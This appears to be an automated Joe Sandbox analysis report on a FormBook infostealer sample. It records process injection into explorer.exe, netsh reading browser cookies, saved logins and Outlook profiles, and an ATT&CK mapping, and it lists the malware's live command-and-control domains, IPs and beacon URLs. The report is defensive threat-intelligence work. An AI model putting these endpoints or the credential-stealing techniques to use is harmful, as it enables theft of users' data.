          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeProcess created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cefJump to behavior
          Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.340255020.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.356385901.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.356385901.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.356385901.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.303378350.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.356013433.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1D945 cpuid 1_2_00B1D945
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1D5D2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00B1D5D2
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040324F

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Uses netsh to modify the Windows network and firewall settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\netsh.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Command and Scripting Interpreter          		Path Interception512
          Process Injection          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Email Collection          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Virtualization/Sandbox Evasion          		11
          Input Capture          		131
          Security Software Discovery          		Remote Desktop Protocol11
          Input Capture          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)512
          Process Injection          		Security Account Manager1
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Archive Collected Data          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Deobfuscate/Decode Files or Information          		NTDS2
          Process Discovery          		Distributed Component Object Model1
          Data from Local System          		Scheduled Transfer114
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information          		LSA Secrets1
          Remote System Discovery          		SSH2
          Clipboard Data          		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync15
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 756313 Sample: qHpeBvr9cR.exe Startdate: 30/11/2022 Architecture: WINDOWS Score: 100 30 www.19t221013d.tokyo 2->30 46 Snort IDS alert for network traffic 2->46 48 Multi AV Scanner detection for domain / URL 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 5 other signatures 2->52 10 qHpeBvr9cR.exe 19 2->10         started        signatures3 process4 file5 28 C:\Users\user\AppData\...\febcldoukq.exe, PE32 10->28 dropped 13 febcldoukq.exe 10->13         started        process6 signatures7 66 Multi AV Scanner detection for dropped file 13->66 68 Machine Learning detection for dropped file 13->68 70 Maps a DLL or memory area into another process 13->70 16 febcldoukq.exe 13->16         started        process8 signatures9 38 Modifies the context of a thread in another process (thread injection) 16->38 40 Maps a DLL or memory area into another process 16->40 42 Sample uses process hollowing technique 16->42 44 Queues an APC in another process (thread injection) 16->44 19 explorer.exe 16->19 injected process10 dnsIp11 32 www.afterdarksocial.club 162.214.129.149, 49711, 49712, 80 UNIFIEDLAYER-AS-1US United States 19->32 34 eufidelizo.com 192.185.217.47, 49707, 80 UNIFIEDLAYER-AS-1US United States 19->34 36 4 other IPs or domains 19->36 54 System process connects to network (likely due to code injection or exploit) 19->54 56 Uses netsh to modify the Windows network and firewall settings 19->56 23 netsh.exe 13 19->23         started        26 autochk.exe 19->26         started        signatures12 process13 signatures14 58 Tries to steal Mail credentials (via file / registry access) 23->58 60 Tries to harvest and steal browser information (history, passwords, etc) 23->60 62 Modifies the context of a thread in another process (thread injection) 23->62 64 Maps a DLL or memory area into another process 23->64

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          qHpeBvr9cR.exe41%ReversingLabsWin32.Trojan.Garf
          qHpeBvr9cR.exe37%VirustotalBrowse
          qHpeBvr9cR.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\febcldoukq.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\febcldoukq.exe20%ReversingLabsWin32.Trojan.FormBook

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.0.febcldoukq.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.2.febcldoukq.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.0.qHpeBvr9cR.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          0.2.qHpeBvr9cR.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          1.2.febcldoukq.exe.17b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.patrickguarte.com1%VirustotalBrowse
          eufidelizo.com9%VirustotalBrowse
          www.lyonfinancialusa.com0%VirustotalBrowse
          www.eufidelizo.com7%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.eufidelizo.com/henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X100%Avira URL Cloudmalware
          http://www.patrickguarte.com/henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X100%Avira URL Cloudmalware
          www.brennancorps.info/henz/100%Avira URL Cloudmalware
          http://www.patrickguarte.com/henz/100%Avira URL Cloudmalware
          http://www.lyonfinancialusa.com/henz/100%Avira URL Cloudmalware
          http://www.afterdarksocial.club/henz/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.patrickguarte.com
          		155.159.61.221
          		truetrueunknown
          eufidelizo.com
          		192.185.217.47
          		truetrueunknown
          www.lyonfinancialusa.com
          		206.233.197.135
          		truetrueunknown
          www.afterdarksocial.club
          		162.214.129.149
          		truetrue
            		unknown
            www.eufidelizo.com
            		unknown
            		unknowntrueunknown
            www.19t221013d.tokyo
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.lyonfinancialusa.com/henz/true
              • Avira URL Cloud: malware
              		unknown
              http://www.eufidelizo.com/henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0Xtrue
              • Avira URL Cloud: malware
              		unknown
              http://www.patrickguarte.com/henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0Xtrue
              • Avira URL Cloud: malware
              		unknown
              http://www.patrickguarte.com/henz/true
              • Avira URL Cloud: malware
              		unknown
              http://www.afterdarksocial.club/henz/true
              • Avira URL Cloud: malware
              		unknown
              www.brennancorps.info/henz/true
              • Avira URL Cloud: malware
              		low

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://ac.ecosia.org/autocomplete?q=-ODfqI49.5.drfalse
                		high
                https://search.yahoo.com?fr=crmas_sfp-ODfqI49.5.drfalse
                  		high
                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.356156439.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.336262975.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.303735560.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://duckduckgo.com/chrome_newtab-ODfqI49.5.drfalse
                      		high
                      https://duckduckgo.com/ac/?q=-ODfqI49.5.drfalse
                        		high
                        http://nsis.sf.net/NSIS_ErrorqHpeBvr9cR.exefalse
                          		high
                          https://www.google.com/images/branding/product/ico/googleg_lodp.ico-ODfqI49.5.drfalse
                            		high
                            https://search.yahoo.com?fr=crmas_sfpf-ODfqI49.5.drfalse
                              		high
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=-ODfqI49.5.drfalse
                                		high
                                https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search-ODfqI49.5.drfalse
                                  		high
                                  http://nsis.sf.net/NSIS_ErrorErrorqHpeBvr9cR.exefalse
                                    		high
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=-ODfqI49.5.drfalse
                                      		high
                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=-ODfqI49.5.drfalse
                                        		high
                                        http://code.jquery.com/jquery-3.3.1.min.jsnetsh.exe, 00000005.00000002.565764534.0000000003B56000.00000004.10000000.00040000.00000000.sdmpfalse
                                          		high
                                          http://gmpg.org/xfn/11netsh.exe, 00000005.00000002.565764534.0000000003B56000.00000004.10000000.00040000.00000000.sdmpfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            192.185.217.47
                                            		eufidelizo.comUnited States
                                            		46606UNIFIEDLAYER-AS-1UStrue
                                            206.233.197.135
                                            		www.lyonfinancialusa.comUnited States
                                            		174COGENT-174UStrue
                                            155.159.61.221
                                            		www.patrickguarte.comSouth Africa
                                            		137951CLAYERLIMITED-AS-APClayerLimitedHKtrue
                                            162.214.129.149
                                            		www.afterdarksocial.clubUnited States
                                            		46606UNIFIEDLAYER-AS-1UStrue

                                            General Information

                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                            Analysis ID:756313
                                            Start date and time:2022-11-30 01:08:08 +01:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 9m 18s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:qHpeBvr9cR.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:9
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@7/5@7/4
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HDC Information:
                                            • Successful, ratio: 76.9% (good quality ratio 67.7%)
                                            • Quality average: 68.7%
                                            • Quality standard deviation: 34.9%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 53
                                            • Number of non-executed functions: 111
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 23.211.4.90
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            192.185.217.47SecuriteInfo.com.FileRepMalware.16929.9956.exeGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?w4hDa6_P=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&cFQ=V2JLd8UPC
                                            xLd3hdhrqJ.exeGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?vv=UDH8sX&2dKD=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==
                                            inquiry 1811_G_2022.xlsGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?g6=wcp3urA+/rGtUuNVdnH1r+maH4Zk43GXlvUWG7FdGjeYGPzd5j/gkjEzvi43j/MvxviINYayZJCRqW/W9XQVTF/IofufAFE08LFc5gk=&m2J0=0N9LsTr0
                                            hjGin4suRR.exeGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?W0DX=w6tXfJTpFTW&4hrd=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0fnfE5LCOM1Ryzg==
                                            m74vEPIwk5.exeGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?3fH8WXCH=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&o0Dl3=Rj3HTZzX0DeLSz
                                            P0qK73fPZ4.exeGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?bBZl=_PvXsR6pHXjPkJe&m2JXFV=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0fnfE5LCOM1Ryzg==
                                            TX7yLkC2TS.exeGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?-ZnD=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0fnfE5LCOM1Ryzg==&z2JtHJ=UBt8FTL
                                            hF6Ip5MMDI.exeGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?RDHh1F=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0fnfE5LCOM1Ryzg==&6lsp=B2MDzdbXOTlT
                                            9061630 - JSW ID KAD new order as of 11.015.2022.xlsGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?btxtd0=wcp3urA+/rGtUuNVdnH1r+maH4Zk43GXlvUWG7FdGjeYGPzd5j/gkjEzvi43j/MvxviINYayZJCRqW/W9XQVTF/IofufAFE08LFc5gk=&7nxT-=hruxZn6hQHp
                                            0.General Representative Agreement Sales TO - Project Base.xlsGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?3fodKL=wcp3urA+/rGtUuNVdnH1r+maH4Zk43GXlvUWG7FdGjeYGPzd5j/gkjEzvi43j/MvxviINYayZJCRqW/W9XQVTF/IofufAFE08LFc5gk=&o4=SFQ4vpDH2Hydg
                                            file.exeGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?0Hut_Lox=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&rVtPIB=VZELH69PZta
                                            Deckles.exeGet hashmaliciousBrowse
                                            • www.eufidelizo.com/um7u/?YXyP=0n3pd2BhJpe0L&XR-tv=RlGM95gtKmWAT9TDK9eV+jU9YQcOVdDyjR3urqCZcyLNJvgg0N3JqRnUrr84y79st1pLk3KSQL7rQAdBjIMn4YAERI7P+DT6Fw==
                                            7ASTu3OkBj.exeGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?IrHDJr=w2JLWvCHczspAV&1bst_NGP=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==
                                            RGkYgSBkAA.exeGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?4hOPTZ=GP_X&5jMl=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0fnfE5LCOM1Ryzg==
                                            fKT7Qe4s7b.exeGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?3fHL=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0fnfE5LCOM1Ryzg==&0pu4=OJBP
                                            Minimal_Stock_Report_11-11-2022-01006.xlsGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?7n-=wcp3urA+/rGtUuNVdnH1r+maH4Zk43GXlvUWG7FdGjeYGPzd5j/gkjEzvi43j/MvxviINYayZJCRqW/W9XQVTF/IofufAFE08LFc5gk=&Y0G=alPl2xE8BlJ
                                            JtUdhdonzo.exeGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?FP=f0DdmxEHuvipVV&MtxPk=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==
                                            New order from Georgia RSLINE.xlsGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?HtxDfNyH=wcp3urA+/rGtUuNVdnH1r+maH4Zk43GXlvUWG7FdGjeYGPzd5j/gkjEzvi43j/MvxviINYayZJCRqW/W9XQVTF/IofufAFE08LFc5gk=&5j=czrxUjO8YxP
                                            B8Ex71teF1.exeGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?5jMH=T8kpkdhhtz5L8tT&zX0=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0fnfE5LCOM1Ryzg==
                                            file.exeGet hashmaliciousBrowse
                                            • www.eufidelizo.com/henz/?bTnX=5ju4ZRux&DHwlCL=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            www.patrickguarte.comSecuriteInfo.com.FileRepMalware.16929.9956.exeGet hashmaliciousBrowse
                                            • 155.159.61.221
                                            xLd3hdhrqJ.exeGet hashmaliciousBrowse
                                            • 155.159.61.221
                                            m74vEPIwk5.exeGet hashmaliciousBrowse
                                            • 155.159.61.221
                                            TX7yLkC2TS.exeGet hashmaliciousBrowse
                                            • 155.159.61.221
                                            WcA10vw4LK.exeGet hashmaliciousBrowse
                                            • 155.159.61.221
                                            hF6Ip5MMDI.exeGet hashmaliciousBrowse
                                            • 155.159.61.221
                                            file.exeGet hashmaliciousBrowse
                                            • 155.159.61.221
                                            7ASTu3OkBj.exeGet hashmaliciousBrowse
                                            • 155.159.61.221
                                            RGkYgSBkAA.exeGet hashmaliciousBrowse
                                            • 155.159.61.221
                                            jYcGmTRl98.exeGet hashmaliciousBrowse
                                            • 155.159.61.221
                                            fKT7Qe4s7b.exeGet hashmaliciousBrowse
                                            • 155.159.61.221
                                            JtUdhdonzo.exeGet hashmaliciousBrowse
                                            • 155.159.61.221
                                            DHL-Express.exeGet hashmaliciousBrowse
                                            • 155.159.61.221
                                            B8Ex71teF1.exeGet hashmaliciousBrowse
                                            • 155.159.61.221
                                            file.exeGet hashmaliciousBrowse
                                            • 155.159.61.221
                                            Purchase Order.exeGet hashmaliciousBrowse
                                            • 155.159.61.221

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            COGENT-174USNovember Draw Disbursed.htmlGet hashmaliciousBrowse
                                            • 38.34.185.163
                                            November Draw Disbursed.htmlGet hashmaliciousBrowse
                                            • 38.34.185.163
                                            Order #RR00-927361823.imgGet hashmaliciousBrowse
                                            • 154.53.55.72
                                            NHYGUnNN.exeGet hashmaliciousBrowse
                                            • 38.55.236.89
                                            robinbotGet hashmaliciousBrowse
                                            • 38.136.33.70
                                            robinbotGet hashmaliciousBrowse
                                            • 38.136.33.70
                                            New PO-RJ-IN-003 - Knauf Queimados.exeGet hashmaliciousBrowse
                                            • 38.163.214.169
                                            Ziraat Bankasi Swift Mesaji20221129-34221.exeGet hashmaliciousBrowse
                                            • 38.239.92.131
                                            Ziraat Bankasi Swift Mesaji20221129-34221.exeGet hashmaliciousBrowse
                                            • 38.239.92.131
                                            KL7955.imgGet hashmaliciousBrowse
                                            • 206.1.131.23
                                            GyKpRhKQY1.elfGet hashmaliciousBrowse
                                            • 38.211.154.4
                                            kTK22xqEq6.elfGet hashmaliciousBrowse
                                            • 204.7.115.146
                                            7HuJu44thW.elfGet hashmaliciousBrowse
                                            • 38.15.202.230
                                            8kH56VSq58.elfGet hashmaliciousBrowse
                                            • 38.140.31.193
                                            mail.us-0LF8-YHCG0N-MBA4-Centor-mail.us-0LF8-YHCG0N-MBA4-Centor-mail.us-0LF8-YHCG0N-MBA4.htmlGet hashmaliciousBrowse
                                            • 38.34.185.163
